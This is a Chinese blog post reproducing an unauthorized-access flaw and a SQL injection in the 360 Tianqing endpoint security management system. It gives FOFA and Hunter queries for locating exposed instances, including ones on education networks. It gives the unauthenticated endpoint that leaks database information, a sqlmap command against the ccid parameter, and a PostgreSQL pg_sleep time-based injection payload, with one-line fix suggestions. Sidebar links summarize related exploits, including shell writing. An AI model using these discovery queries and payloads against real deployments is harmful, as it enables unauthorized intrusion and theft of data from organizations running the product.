EDUSRC-记某擎未授权与sql注入

已于 2023-10-17 10:21:13 修改
阅读量341 收藏
点赞数
分类专栏: SQL 文章标签: sql 数据库
于 2023-10-12 11:53:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/133787651
版权

目录

360天擎 - 未授权与sql注入

信息收集

FOFA语法

鹰图搜索

360天擎未授权访问 - 数据库信息泄露

漏洞复现

修复方案

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

手动测试方法

360天擎 - 未授权与sql注入

通常访问的页面如下,存在登录框

信息收集

FOFA语法

  1. title="360新天擎"

需重点关注框框的图标,可以聚焦资产搜索

  1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法,相对来说资产较少,因为是老洞

  1. web.title="360新天擎"&& ip.isp="教育"

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

  1. GET /api/dbstat/gettablessize HTTP/1.1
  2. Host: {{Hostname}}

修复方案

未授权更多的是鉴权问题,增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

  1. GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

这时候丢到sqlmap中(可能会慢,因为是时间注入)

  1. python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

手动测试方法

360天擎用的大概率是PostgreSQL,尝试如下时间注入payload,然后注意页面响应时间

  1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

还没看够?可以关注一下呦~

 渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令
SQL注入攻击与防御-第2版
10-11
主要内容: ·发现、确认和自动发现SQL注入漏洞 ·通过SQL注入利用漏洞 ·在代码中发现SQL注入的方法和技巧 ·利用操作系统的漏洞 ·在代码层和平台层防御SQL注入攻击 ·确定是否已经遭到SQL注入攻击
PHP与SQL注入攻击[三]
10-30
PHP与SQL注入攻击[三]
奇安信360天擎getsimilarlist存在SQL注入漏洞
holyxp的博客
11-09 669
奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。通过“体系化防御、数字化运营”方法,帮助政企客户准确识别、保护和监管终端,并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务 [1] 。 [2] 天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能
漏洞复现--奇安信360天擎rptsvcsyncpointSQL注入
qq_53003652的博客
11-10 522
天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。该产品存在SQL注入漏洞,攻击者可通过此漏洞获取服务器权限。注入点在ccid,且数据库为PostgreSQL
360天擎-前台sql注入1
08-03
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
2021HW总结 下一次:Red team【文末有福利】
afei001
04-25 1272
4月8号,接到公安部通知,xxx关x院参加HW。于是... 我临时接到通知,客户那边接到hw通知。领导通知我,要去那边值守,于是就来了某关HW。封ip,封ip,封ip...。 去年HW,就像一个傻子一样;今年HW,依旧是个傻子,聪明的傻子。 咱们就是值守的,白天封ip,晚上定时物理断网。没错就是物理断网,俗称"拔网线"。 afei 网线一拔,RD你来呀,内网业务大部分都关了,还是好好回去睡觉吧。 ...
360天擎sql注入&&授权访问
weixin_43227251的博客
04-14 3301
天擎 前台SQL注入 漏洞描述 天擎 存在SQL注入,攻击者可以通过漏洞上传木马 FOFA指纹 title=“360天擎” 漏洞复现 漏洞地址 /api/dp/rptsvcsyncpoint?ccid=1 注入写shell: sqlmap python sqlmap.py -u https://x.x.x.x:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL 天擎 数据库信息泄露漏洞 漏洞描述 天擎 存在授权越权访问,造成敏感信息泄露 漏洞复现
2021年网络安全设备漏洞集合
weixin_47536169的博客
07-13 3638
360天擎SQL注入漏洞 描述 fofa title="360天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露 描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过 描述 fofa:title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..
360天擎终端安全系统信息泄露漏洞及poc脚本批量验证
weixin_43802646的博客
09-14 876
360天擎终端安全系统是面向行政单位的一系列产品安全处理方案,该终端安全系统存在授权访问漏洞,导致一定敏感信息泄露。
edusrc通杀漏洞笔(注入篇)
最新发布
qq_51542789的博客
12-14 555
SQL注入是很常见的漏洞了,网上文章也特别多,各位看官自行百度(人比较懒),属实废话了,本人文采也不是特别好,所以该文章截图会比较多,不喜勿喷。还有,这是SRC挖掘,所以都是点到为止,不过有师傅说菜我也照单全收,因为我是要成为xx康第一打螺丝手的存在,废话不多说,开始正文。
天擎终端安全管理系统授权访问&SQL注入漏洞
千寻的博客
05-06 3187
文章目录漏洞名称漏洞描述影响版本FOFA漏洞复现授权复现第一步 查看漏洞点第二步 查看越权访问sql注入复现第一步 sql注入点第二步 延时注入修复建议 漏洞名称 天擎终端安全管理系统授权访问&SQL注入漏洞 漏洞描述 天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。 该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护; 天擎终端安全管理系统存在
一次挖edusrc漏洞挖掘(sql注入
Lulzcart的博客
01-22 1765
一次挖edusrc漏洞挖掘(sql注入
2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节
weixin_45032957的博客
04-21 847
POC为POST 类型的HTTP 请求报文 POST /directdata/direct/router HTTP/1.1 Host: x.x.x.x Connection: close Cache-Control: max-age=0 sec-ch-ua: “Google Chrome”;v=“89”, “Chromium”;v=“89”, “;Not A Brand”;v=“99” sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent:
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1323
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
某60终端安全管理系统前台SQL注入漏洞复现
afei001
04-10 2316
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 FOFA实战复现 4.1.1 SQLmap爆库 4.1.2 尝试--os-shell 4.1.3 反弹shell 4.1.4 写入Webshell 4.2 360_Day-with_front-desk_SQLi-EXP 5.漏洞修复 声明: 文中脚本具有攻击性,请勿违法使用,否则后果自负! 1.漏洞概述 360天擎终端安全管系统是360面向政府、企业、金融、军队、医疗...
录一次挖取学校edusrc——SQL注入
CC__Faker的博客
06-07 4977
前言 这次漏洞发现其实并不是刻意去扫描挖掘的,当时是百度搜了下学校站点,查到本校的继续教育学院,里面有个录取结果查询模块。随手测了几句sql发现竟然报错了,于是开始对漏洞危害的验证。 0x00 测试工具 burpsuite sqlmap 0x01注点判断 常规and 1=1 ,1=2试试,网页正常反馈。 尝试让页面报错。 没想到出现了回显信息,回显信息中还打印了sql语句,网站目录等信息。 1)SQL语句为”SELECT * FROM baoming_list WHERE shenfenzhengh
360网站卫士SQL注入绕过案例一个
weixin_30911809的博客
01-23 375
不要以为用了360就可以高枕无忧,直接在netcraft的site_report中找到源站服务器IP,直接SQL脱裤,甚至可获取服务器权限。 存在漏洞的网站: 手工测试存在注入点: 但是网站有360保护,没法脱裤,必须想办法绕过: 360网站卫士都是劫持域名进行流量清洗,但是如果源站服务器防护的不好可能存在绕过。于是在网上搜索,终于在netcraft上找到: 源...
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值